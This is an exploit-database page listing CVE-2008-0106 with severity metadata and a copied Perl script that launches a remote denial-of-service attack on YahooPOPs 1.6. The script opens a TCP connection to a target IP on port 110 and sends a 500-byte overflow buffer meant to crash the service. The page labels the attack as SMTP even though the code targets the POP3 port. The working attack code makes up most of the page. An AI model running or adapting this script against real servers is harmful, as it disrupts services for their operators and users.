Advertisement






YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

CVE Category Price Severity
CVE-2008-0106 CWE-399 Not specified High
Author Risk Exploitation Type Date
str0ke High Remote 2024-01-26
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010080

Below is a copy:

YahooPOPs 1.6 - SMTP - Denial of Service (DoS)
use IO::Socket;

   sub intro {
      print q {

                            ,--,
                     _ ___/ /\|
                 ,;'( )__, )  ~
                //  //   '--; 
                '   \     | ^
                     ^    ^

    [+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

    [*] Coded by Fernando Mengali

    [@] e-mail: [email protected]

      }
  }

intro();


    if (!$ARGV[0]) {
        print "\nUsage: $0 <ip> <username> <password>\n";
        exit(0);
}

my $host = $ARGV[0];
my $username = $ARGV[1];
my $password = $ARGV[2];
my $port = 110;
my $payload  = "A" x 500;

my $ip = inet_aton($ARGV[0]);

my $socket = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 10
);

unless ($socket) {
    die "[+] socket() error: $!\n";
}

print "[+] YahooPOPS SMTP detected, constructing the payload\n";

unless ($socket->send($payload)) {
    die "[+] Sending error, the server probably rebooted.\n";
}

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.